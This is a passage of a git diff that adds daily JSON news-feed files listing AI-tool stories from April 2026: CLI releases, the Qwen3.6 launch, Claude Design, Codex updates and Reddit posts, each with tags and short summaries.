slow.\n\n\n\nskillgrab does this:\n\n\n\n1. Scans \\`package.json\\`, \\`requirements.txt\\`, \\`pubspec.yaml\\`, \\`go.mod\\`, \\`Dockerfile\\`, \\`vercel.json\\`, etc. to detect your stack\n\n2. Reads your README for non-code hints (\"landing page\", \"pricing\", \"SEO\") and asks if you want marketing/design/sales skills\n\n3. Queries [skills.sh]", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.38.1 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.1", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-15T17:56:33.000Z", + "summary": "## What's Changed\n* fix(patch): cherry-pick 050c303 to release/v0.38.0-pr-25317 to patch version v0.38.0 and create version 0.38.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25466\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.0...v0.38.1", + "category": "ai_tools" + }, + { + "title": "MidJourney V8.1 Alpha Has Just Been Released. How Much Improvement Does It Have?", + "url": "https://reddit.com/r/midjourney/comments/1smlk07/midjourney_v81_alpha_has_just_been_released_how/", + "source": "Reddit r/midjourney", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-15T22:45:01.000Z", + "summary": "A new r/midjourney version always creates excitement. Beautiful sample images start appearing everywhere, people begin testing it immediately, and the usual question follows:\n\n**Is it really better, or is it just new?**\n\nWith MidJourney V8.1 Alpha now available, I wanted to look beyond the hype and test it in a more practical way.\n\nInstead of judging it in isolation, I compared it against two other strong image models available today: **Nano Banana 2** and **Grok Imagine 1.0.**\n\nThe goal was sim", + "category": "creative_tools" + }, + { + "title": "Great news, everyone. If you were sick of the condescending 5.2 model, creators have announced 5.3, with a less preachy tone. I have tested it over the last few days and it has become more balanced.", + "url": "https://reddit.com/r/ChatGPT/comments/1smkzda/great_news_everyone_if_you_were_sick_of_the/", + "source": "Reddit r/ChatGPT", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-15T22:21:37.000Z", + "summary": "I noticed a change from the condescending, sometimes rude and persistent looping behaviour of ChatGPT 5.2, so I asked Google about it and got this confirmation back that in March they updated to 5.3. I think I'm starting to receive that model now because it's become less preachy and isn't looping into psychoanalysis of me every time I talk to it.\n\n\n\nChatGPT has likely felt \"nicer\" recently due to several updates in early 2026 designed to improve its conversational tone and reduce the rigid, robo", + "category": "ai_tools" + }, + { + "title": "Qwen3.5 35b is sure still one the best local model (pulling above its weight) - More Details", + "url": "https://reddit.com/r/LocalLLaMA/comments/1smgqgy/qwen35_35b_is_sure_still_one_the_best_local_model/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-15T19:46:08.000Z", + "summary": "Last time I posted on how this model has performed in creating the webapp based on provided research paper. I got so much love to see people has appreciated the post and of-course the potential of this MOE model.\n\nI am sharing details on how I used this model to create webapp just using prompt and step by step guiding it. Later I converted my guidance steps into skills using same qwen-code cli with this model, that helped to add more examples.\n\nHere is github repo where I have added the [researc", + "category": "ai_models" + }, + { + "title": "Is it possible for an open-source AI that you run at home to become as powerful as that of chatgpt and others at that level?", + "url": "https://reddit.com/r/ChatGPT/comments/1smepps/is_it_possible_for_an_opensource_ai_that_you_run/", + "source": "Reddit r/ChatGPT", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-15T18:34:26.000Z", + "summary": "What would need to be true for someone to be able to run something that powerful entirely from home? Do they just need the correct weights? Assume that they don't need to do training (maybe some tech enthusiast does the training and just hands off the built model to people). Would storage space be a constraint? How much storage would they need? And how much RAM would they need? This is all for 1 person using it, not like the person would be serving an AI service out of their garage or something", + "category": "ai_tools" + }, + { + "title": "Lyra 2.0 : Explorable Generative 3D Worlds", + "url": "https://reddit.com/r/StableDiffusion/comments/1smbyjf/lyra_20_explorable_generative_3d_worlds/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-15T16:59:26.000Z", + "summary": "Nvidia released **Lyra 2.0**, a framework for generating persistent, explorable 3D worlds at scale, from NVIDIA Research. \n \nGenerating large-scale, complex environments is difficult for AI models. Current models often “forget” what spaces look like and lose track of movement over time, causing objects to shift, blur, or appear inconsistent. This prevents them from creating the reliable 3D environments required for downstream simulations. Lyra 2.0 solves these issues by: \n \n Maintaining per-", + "category": "creative_tools" + }, + { + "title": "[P] Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sm82ze/p_built_gpt2_llama_3_and_deepseek_from_scratch_in/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-15T14:42:55.000Z", + "summary": "I wrote a book that implements modern LLM architectures from scratch. The part most relevant to this sub:\n\nChapter 3 takes GPT-2 and swaps exactly 4 things to get Llama 3.2-3B:\n\n1. LayerNorm → RMSNorm\n2. Learned positional encodings → RoPE\n3. GELU → SwiGLU\n4. Multi-Head Attention → Grouped-Query Attention\n\nThen loads Meta's real pretrained weights.\n\nChapter 5 builds DeepSeek's full architecture: MLA with the absorption trick, decoupled RoPE, MoE with shared experts and fine-grained segmentation,", + "category": "ai_models" + }, + { + "title": "Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book [p]", + "url": "https://reddit.com/r/MachineLearning/comments/1sm75yf/built_gpt2_llama_3_and_deepseek_from_scratch_in/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-15T14:08:23.000Z", + "summary": "I spent the past year implementing five LLM architectures from scratch in PyTorch and wrote a book documenting the process.\n\nWhat's covered:\n\n* Vanilla encoder-decoder transformer (English to Hindi translation)\n* GPT-2 (124M), loading real OpenAI pretrained weights\n* Llama 3.2-3B, showing the exact 4 component swaps from GPT-2 (RMSNorm, RoPE, SwiGLU, GQA), loading Meta's pretrained weights\n* KV cache mechanics, MQA, GQA\n* DeepSeek: Multi-Head Latent Attention with absorption trick and decoupled ", + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-16.json b/data/news-feed-2026-04-16.json new file mode 100644 index 0000000..0a03285 --- /dev/null +++ b/data/news-feed-2026-04-16.json @@ -0,0 +1,259 @@ +{ + "generated": "2026-06-05T00:44:34.430Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-16", + "article_count": 15, + "archived_story_count": 396, + "articles": [ + { + "title": "Vercel CLI vercel@51.5.1 released", + "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.5.1", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-16T20:37:28.000Z", + "summary": "### Patch Changes\n\n- Improve Claude Code Vercel plugin install and update prompts across CLI commands. ([#15921](https://github.com/vercel/vercel/pull/15921))\n\n- Updated dependencies \\[[`5219572d21a2ba4b49cc1c27d244c1ff5d76c591`](https://github.com/vercel/vercel/commit/5219572d21a2ba4b49cc1c27d244c1ff5d76c591), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://github.com/vercel/vercel/commit/2babfa22946d80a92f1307a8d860a9039d695b09), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://gi", + "category": "ai_tools" + }, + { + "title": "I got tired of copying/pasting between ChatGPT and X, so I built an extension that brings the AI directly into the timeline", + "url": "https://reddit.com/r/ChatGPT/comments/1snf7bl/i_got_tired_of_copyingpasting_between_chatgpt_and/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-16T20:20:53.000Z", + "summary": "I use ChatGPT to help draft posts or brainstorm replies, but the workflow of copying tweets, pasting them into ChatGPT, asking it to reply, and then pasting it back into Twitter was driving me crazy. Also, it almost always sounds like a generic robot\n\nSo, I built **Tweetback**, a Chrome/Edge/Firefox extension that brings your API key directly into the X/Twitter interface.\n\nI wanted to see how far I could push the AI to actually understand context and sound human. Here is what it can do:\n\n**\"Clon", + "category": "ai_tools" + }, + { + "title": "anyone else notice labs are getting more secretive about their best models?", + "url": "https://reddit.com/r/ChatGPT/comments/1sn599k/anyone_else_notice_labs_are_getting_more/", + "source": "Reddit r/ChatGPT", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-16T14:31:54.000Z", + "summary": "something shifted recently and i can't stop thinking about it. the trend used to be: new model drops, blog post goes up, everyone gets access on day one. now it feels like the most capable stuff is quietly going behind walls with \"restricted access\" or gated research programs, while the public-facing releases are... fine, but clearly not the frontier.\n\ngoogle dropped gemma 4 open-weight and it's genuinely good — MoE architecture, strong reasoning, apache license. meta's doing multimodal reasonin", + "category": "ai_tools" + }, + { + "title": "Mozilla Announces \"Thunderbolt\" As An Open-Source, Enterprise AI Client", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sn4ibj/mozilla_announces_thunderbolt_as_an_opensource/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-16T14:04:23.000Z", + "summary": "Reddit r/LocalLLaMA — 4 upvotes, 3 comments", + "category": "ai_models" + }, + { + "title": "Qwen3.6-35B-A3B released!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sn3izh/qwen3635ba3b_released/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-16T13:27:39.000Z", + "summary": "Meet Qwen3.6-35B-A3B:Now Open-Source!🚀🚀\n\nA sparse MoE model, 35B total params, 3B active. Apache 2.0 license.\n\n\\- Agentic coding on par with models 10x its active size\n\n\\- Strong multimodal perception and reasoning ability\n\n\\- Multimodal thinking + non-thinking modes\n\nEfficient. Powerful. Versatile. \n\nBlog:https://qwen.ai/blog?id=qwen3.6-35b-a3b\n\nQwen Studio:chat.qwen.ai\n\nHuggingFace:https://huggingface.co/Qwen/Qwen3.6-35B-A3B\n\nModelScope:https://modelscope.cn/models/Qwen/Qwen3.6-35B-A3B", + "category": "ai_models" + }, + { + "title": "Built a visual memory layer for Claude — see what Claude remembers about your projects (open source, free, WIP)", + "url": "https://reddit.com/r/ClaudeAI/comments/1smzaxb/built_a_visual_memory_layer_for_claude_see_what/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-16T10:13:13.000Z", + "summary": " Claude already has memory — but it's a black box. \n You can't see what it knows, what decisions were made, \n or how your project is progressing.\n \n Dendrite makes Claude's memory visible.\n \n How it works:\n - Claude writes structured memory slices via MCP \n (decisions, observations, tasks, open questions)\n - You see everything in a searchable 3-pane reader\n - Set your own preferences that Claude pulls from \n on every session\n - Track project progress, o", + "category": "ai_tools" + }, + { + "title": "Built an political benchmark for LLMs. KIMI K2 can't answer about Taiwan (Obviously). GPT-5.3 refuses 100% of questions when given an opt-out. [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1smqsbu/built_an_political_benchmark_for_llms_kimi_k2/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-16T02:31:24.000Z", + "summary": "I spent the few days building a benchmark that maps where frontier LLMs fall on a 2D political compass (economic left/right + social progressive/conservative) using 98 structured questions across 14 policy areas. I tested GPT-5.3, Claude Opus 4.6, and KIMI K2. The results are interesting.\n\n\n\n**The repo is fully open-source -- run it yourself on any model with an API:** \n[https://github.com/dannyyaou/llm-political-eval](https://github.com/dannyyaou/llm-political-eval)\n\n\n\n\n\n**The headline finding", + "category": "ai_research" + }, + { + "title": "Keycard – inject API keys into subprocesses, never touch shell env", + "url": "https://www.keycard.studio/", + "source": "Hacker News", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.97, + "date": "2026-04-16T01:37:49.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "I turned my MacBook notch into a live Claude Code dashboard", + "url": "https://reddit.com/r/ClaudeAI/comments/1smm0mo/i_turned_my_macbook_notch_into_a_live_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.91, + "date": "2026-04-15T23:04:00.000Z", + "summary": "Notch Pilot lives in the MacBook notch (no menu bar icon, no dock icon) and shows:\n\n* Live 5-hour session % + weekly limits — the exact numbers from your Claude account page, pulled from the same oauth/usage endpoint Claude Code uses.\n* Permission prompts rendered inline — shell commands get a code block, file edits get a red/green diff, URLs get parsed. Deny / Allow / Always allow, with \"always allow\" writing to \\~/.claude/settings.json.\n* Every live session at a glance — project, model, uptime", + "category": "ai_tools" + }, + { + "title": "OpenClaw v2026.4.15 released", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.4.15", + "source": "GitHub Releases · OpenClaw", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-04-16T21:50:22.000Z", + "summary": "\n### Changes\n\n- Anthropic/models: default Anthropic selections, `opus` aliases, Claude CLI defaults, and bundled image understanding to Claude Opus 4.7.\n- Google/TTS: add Gemini text-to-speech support to the bundled `google` plugin, including provider registration, voice selection, WAV reply output, PCM telephony output, and setup/docs guidance. (#67515) Thanks @barronlroth.\n\n### Fixes\n\n- Agents/skills: sort prompt-facing `available_skills` entries by skill name after merging sources so `skills.", + "category": "ai_tools" + }, + { + "title": "Crush v0.59.0 released", + "url": "https://github.com/charmbracelet/crush/releases/tag/v0.59.0", + "source": "GitHub Releases · Crush", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.84, + "date": "2026-04-16T21:21:52.000Z", + "summary": "## Changelog\n### New!\n* 3773b23cb44afc4567d892f01c41c8dc62556ca0: feat(shell): add jq as a bash builtin + a jq skill for it (@meowgorithm)\n* b37649e45299d426aeae73a54efc0d1155fb5c91: feat(ui): add skills discovery status to sidebar and landing page (#2384) (@huaiyuWangh)\n* e8f5e2025d2401ffe06123c42226f3b7a20abe3a: feat: show progress bar on rio terminal (#2624) (@andreynering)\n### Fixed\n* f546a071891c4ced02c832ff1789534df2874bda: fix(prompt): remind coder to follow `` format on comm", + "category": "ai_tools" + }, + { + "title": "Qwen3.6-35B is worse at tool use and reasoning loops than 3.5?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sni4c1/qwen3635b_is_worse_at_tool_use_and_reasoning/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-16T22:09:37.000Z", + "summary": "Been running the new model entire evening in different quants and coding tasks with OpenCode. Used oMLX and LM Studio. Used recommended settings for precise tasks (temp 0.6, top-k 20, etc) and OpenCode agent. So far my findings is that the model goes into infinite reasoning loops more often than 3.5, and I sometimes see failed tool calls. The latter could be parser bugs, but the former is the model itself.\n\nIt’s ok on basic apps, but really struggles to move ahead on something more complex like ", + "category": "ai_models" + }, + { + "title": "PSA: Qwen3.6 ships with preserve_thinking. Make sure you have it on.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sne4gh/psa_qwen36_ships_with_preserve_thinking_make_sure/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-16T19:41:55.000Z", + "summary": "I had previously posted [here about a fix to their 3.5 template ](https://www.reddit.com/r/LocalLLaMA/comments/1sg076h/i_tracked_a_major_cache_reuse_issue_down_to_qwen/)to help resolve the KV cache invalidation issue from their template. A lot of you found it useful.\n\nQwen 3.6 now addresses this with a new preserve\\_thinking flag. From their [model page:](https://huggingface.co/Qwen/Qwen3.6-35B-A3B)\n\n>`please use \"preserve_thinking\": True instead of \"chat_template_kwargs\": {\"preserve_thinking", + "category": "ai_models" + }, + { + "title": "Google, please just open source Imagen (2022), Gemini 1.0 Nano and Gemini 1.0 Pro. You have nothing to lose at this point.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sncslc/google_please_just_open_source_imagen_2022_gemini/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-16T18:54:41.000Z", + "summary": "Ok, so imagen (the original one from 2022, not imagen 3/4) should be open source. The gemini 1.0 nano model and the gemini 1.0 pro models should be open source. xAI already open-sourced grok 1, but Google???????? at this point you should open source this\n\nGoogle if you seeing this (prob. not) please open source it in I/O 2026\n\n \nEdit: please open source also palm 2 unicorn and bison, geminii 3.1 destroys it", + "category": "ai_models" + }, + { + "title": "Replaced an LLM's text generation head with one that emits raw machine opcodes. Here are my findings", + "url": "https://reddit.com/r/LocalLLaMA/comments/1snbyh8/replaced_an_llms_text_generation_head_with_one/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-16T18:25:26.000Z", + "summary": "Follow-up to [my previous post](https://www.reddit.com/r/LocalLLaMA/comments/1sm076z/i_cant_stop_thinking_about_this_why_are_we_making/) about why AI agents should not control machines through text.\n\nThe idea: every AI agent today generates human text, parses it, then executes it. That's like controlling a robot arm by dictating English. Tesla FSD replaced that pattern. Cameras go in, steering commands come out, no text in between. Can we do the same for software? Skip the text, emit machine ins", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-17.json b/data/news-feed-2026-04-17.json new file mode 100644 index 0000000..d9f8d55 --- /dev/null +++ b/data/news-feed-2026-04-17.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:34.625Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-17", + "article_count": 15, + "archived_story_count": 370, + "articles": [ + { + "title": "Crush v0.60.0 released", + "url": "https://github.com/charmbracelet/crush/releases/tag/v0.60.0", + "source": "GitHub Releases · Crush", + "tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-17T16:55:33.000Z", + "summary": "# Secret release\r\n\r\nYou're not supposed to read through the changelog below.\r\n\r\n## Changelog\r\n### New!\r\n* ea86101bf6c61ee05ca3e887ea65d2f5ff9e68d7: feat(hyper): use openai-compatible endpoint for hyper (#2640) (@andreynering)\r\n\r\n---\r\n\r\n
      \r\nVerifying the artifacts\r\n\r\nFirst, download the [`checksums.txt` file](https://github.com/charmbracelet/crush/releases/download/v0.60.0/checksums.txt) and the [`checksums.txt.sigstore.json` file](https://github.com/charmbracelet/crush/", + "category": "ai_tools" + }, + { + "title": "Adapt: open-source memory that rewrites its own structure when your data surprises it", + "url": "https://reddit.com/r/LocalLLaMA/comments/1so002u/adapt_opensource_memory_that_rewrites_its_own/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-17T12:48:26.000Z", + "summary": "TypeScript library I've been building. The thing I want feedback on: when the memory keeps dismissing data it shouldn't, or queries keep coming back empty, it restructures itself;splits overloaded learners, merges redundant ones, grows new ones for domains nobody configured. \n \nWorks with any Vercel AI SDK provider, so Ollama / LM Studio / llama.cpp plus hosted. \n \nObserve and synthesize are separate LLM calls, so you can run a 7B for observe (the high-volume path) and a bigger model for s", + "category": "ai_models" + }, + { + "title": "Anthropic's AI protocol has critical flaw affecting 200,000 servers", + "url": "https://reddit.com/r/ClaudeAI/comments/1snx2nw/anthropics_ai_protocol_has_critical_flaw/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-17T10:29:36.000Z", + "summary": "https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/\n\nSecurity researchers at OX Security disclosed on Tuesday what they describe as a critical, systemic vulnerability in Anthropic's Model Context Protocol, an open-source standard that allows AI models to connect to external data sources and systems. The flaw could enable arbitrary command execution on any vulnerable system, potentially exposing sensitive user data, internal databases, API keys, and chat histories across more", + "category": "ai_tools" + }, + { + "title": "OpenAI Codex Just Got Its Biggest Update Yet", + "url": "https://reddit.com/r/ChatGPT/comments/1sno26n/openai_codex_just_got_its_biggest_update_yet/", + "source": "Reddit r/ChatGPT", + "tags": [ + "developer_tool", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-17T02:27:24.000Z", + "summary": "OpenAI says Codex now works in the app, IDE, terminal, web, GitHub, iOS, and Slack. \n \nRecent upgrades bundled a new GPT-5.3-Codex model for agentic coding, a rebuilt CLI, an IDE extension for VS Code-compatible editors, faster cloud task performance via container caching, automated code review, an in-app browser for rendered pages, and computer use for macOS apps. \n \nApril 2026 added three more shifts: a token-based credit billing model, a new $100 Pro tier with up to 10x Plus usage, and ", + "category": "ai_tools" + }, + { + "title": "[Resource] Anima Style Explorer: A free web tool for ComfyUI styles + Open Source MooshieUI Desktop Client", + "url": "https://reddit.com/r/StableDiffusion/comments/1snkume/resource_anima_style_explorer_a_free_web_tool_for/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-17T00:03:20.000Z", + "summary": "I wanted to share a project I have been building for the community called Anima. It is a completely free web-based style explorer designed to help you discover and visualize different aesthetic prompts and configurations for your Stable Diffusion generations without guesswork.\n\nWeb Version: [https://anima.mooshieblob.com/](https://anima.mooshieblob.com/)\n\n**MooshieUI Integration (Open Source)**\n\nFor those who prefer a local workflow, I have also integrated this into MooshieUI. This is a custom, ", + "category": "creative_tools" + }, + { + "title": "How to Implement Karpathy's LLM Knowledge Base. Full Guide", + "url": "https://reddit.com/r/ChatGPT/comments/1so334n/how_to_implement_karpathys_llm_knowledge_base/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.98, + "date": "2026-04-17T14:45:37.000Z", + "summary": "karpathy introduced his LLM Knowledge base Wiki last week. We've been quietly doing a version of this for months at our Org, but his write-up made me realize how much further you can take it with the right setup.\n\n**the core idea**: using LLM to compile and maintain knowledge. **you feed source documents** \\- articles, papers, sdk references, repos into a raw directory. the model incrementally builds a wiki from them. markdown files, summaries, backlinks, categorized by concept. the llm writes", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.38.2 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.2", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-17T18:38:59.000Z", + "summary": "## What's Changed\n* fix(patch): cherry-pick 14b2f35 to release/v0.38.1-pr-24974 to patch version v0.38.1 and create version 0.38.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25585\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.1...v0.38.2", + "category": "ai_tools" + }, + { + "title": "Vercel CLI vercel@51.7.0 released", + "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.7.0", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-04-17T22:38:37.000Z", + "summary": "### Minor Changes\n\n- [detect-services] If a vercel.toml exists, update the vercel.toml ([#15895](https://github.com/vercel/vercel/pull/15895))\n\n- Use correct filename in messages when config file is not vercel.json ([#15893](https://github.com/vercel/vercel/pull/15893))\n\n- [services] move Python workers to v2beta triggers with private routing ([#15920](https://github.com/vercel/vercel/pull/15920))\n\n### Patch Changes\n\n- Include `action` and `resource` fields from API 403 responses in non-", + "category": "ai_tools" + }, + { + "title": "Vercel CLI vercel@51.6.1 released", + "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.6.1", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.84, + "date": "2026-04-17T02:34:08.000Z", + "summary": "### Patch Changes\n\n- Updated dependencies \\[[`055f6239a4fe763b9f3b33cfbb5baa2e0e214767`](https://github.com/vercel/vercel/commit/055f6239a4fe763b9f3b33cfbb5baa2e0e214767)]:\n - @vercel/build-utils@13.18.0\n - @vercel/backends@0.1.0\n - @vercel/python@6.34.0\n - @vercel/elysia@0.1.68\n - @vercel/express@0.1.78\n - @vercel/fastify@0.1.71\n - @vercel/go@3.5.0\n - @vercel/h3@0.1.77\n - @vercel/hono@0.2.71\n - @vercel/hydrogen@1.3.6\n - @vercel/koa@0.1.51", + "category": "ai_tools" + }, + { + "title": "CadQuery is an open-source Python library for building 3D CAD models", + "url": "https://cadquery.github.io/", + "source": "Hacker News", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.84, + "date": "2026-04-14T23:20:39.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Qwen3.6 GGUF is so good for debugging.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sofcqv/qwen36_gguf_is_so_good_for_debugging/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-17T22:13:05.000Z", + "summary": "using unsloth dynamic quant on 16GB vram + 32GB dram. 200k q8\\_0 kv cache (context window)", + "category": "ai_models" + }, + { + "title": "Intel Arc Pro B70 Open-Source Linux Performance Against NVIDIA RTX & AMD Radeon AI PRO Review", + "url": "https://reddit.com/r/LocalLLaMA/comments/1soe0nm/intel_arc_pro_b70_opensource_linux_performance/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-17T21:20:59.000Z", + "summary": "The R9700 is about 30% more than the B70, but it's more than 30% better. Overall, I rather have a R9700 than a B70.\n\n", + "category": "ai_models" + }, + { + "title": "Trying to Run LTX2.3 locally but getting an error", + "url": "https://reddit.com/r/StableDiffusion/comments/1sodw5o/trying_to_run_ltx23_locally_but_getting_an_error/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-17T21:16:26.000Z", + "summary": "I'm pretty new to all of this, but I thought that the cool thing about LTX 2.3 was that you are able to do image and video generation locally on your own hardware. But it's still connected to the API key that I created which makes it think I'm still trying to use it through the cloud. I tried switching the model to something that would make it generate locally but I guess that wasn't the solution? It was a 25 GB download so I thought that was the answer but now I'm stumped. Can someone explain h", + "category": "creative_tools" + }, + { + "title": "Claude Design just launched and Figma dropped 4.26% in a single day, we are witnessing history in real time", + "url": "https://reddit.com/r/ClaudeAI/comments/1so6z2t/claude_design_just_launched_and_figma_dropped_426/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-17T17:04:24.000Z", + "summary": "I genuinely cannot believe what I'm watching unfold today\n\nAnthropic dropped Claude Design this morning , a tool that lets anyone describe what they want and get back a full website, landing page, or presentation. No design skills needed and No Figma subscription. Just... talk to it\n\nAnd the market reacted instantly. Figma stock is down $0.86 (4.26%) today alone. Adobe, Wix, GoDaddy all bled too. Anthropic's own CPO literally resigned from Figma's board three days ago. The writing was on the wal", + "category": "ai_tools" + }, + { + "title": "Fastest image to image model", + "url": "https://reddit.com/r/StableDiffusion/comments/1so6um1/fastest_image_to_image_model/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-17T17:00:09.000Z", + "summary": "Does anybody know a platform that can deliver **image-to-image** responses in their **API** in less than **7** seconds? I already tried **Nano Banana**, but it takes about **16** seconds or more.", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-18.json b/data/news-feed-2026-04-18.json new file mode 100644 index 0000000..eb464a3 --- /dev/null +++ b/data/news-feed-2026-04-18.json @@ -0,0 +1,249 @@ +{ + "generated": "2026-06-05T00:44:34.827Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-18", + "article_count": 15, + "archived_story_count": 256, + "articles": [ + { + "title": "[Update] GHOST v2.1: Full Native Windows Support is Live.", + "url": 